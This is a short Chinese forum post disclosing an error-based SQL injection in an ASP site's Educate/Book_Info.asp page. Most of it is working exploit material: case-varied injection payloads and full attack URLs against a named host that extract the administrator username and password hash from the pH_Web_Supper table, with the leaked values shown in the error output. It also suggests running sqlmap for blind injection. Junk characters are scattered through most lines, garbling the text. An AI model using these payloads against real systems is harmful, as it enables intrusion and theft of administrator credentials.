漏洞出现在Educate/Book_Info.asp
' p# d- X% X g: z: A0 \此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
N) |% R) @8 t8 p# ~8 Lexp:如下
5 b+ ^- i0 w/ e+ O查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
3 Q! N& Z8 B0 Q: ?0 v' Q0 C查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
6 M q s; U- }* ~http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
1 @* W: x' C8 \" \* }! g5 FMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
% N6 r1 V3 y" ?9 z8 j$ {将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。' z: Y1 P% k3 M0 R/ k" f+ n
/Educate/Book_Info.asp,行 8
( i# j( W8 b6 ^. a, ?, Xhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 f4 [7 v5 j; M% ?* M4 gMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
9 k$ d) H* U; z将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。/ B$ o- q d$ Z( X, |! s6 Z/ {
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对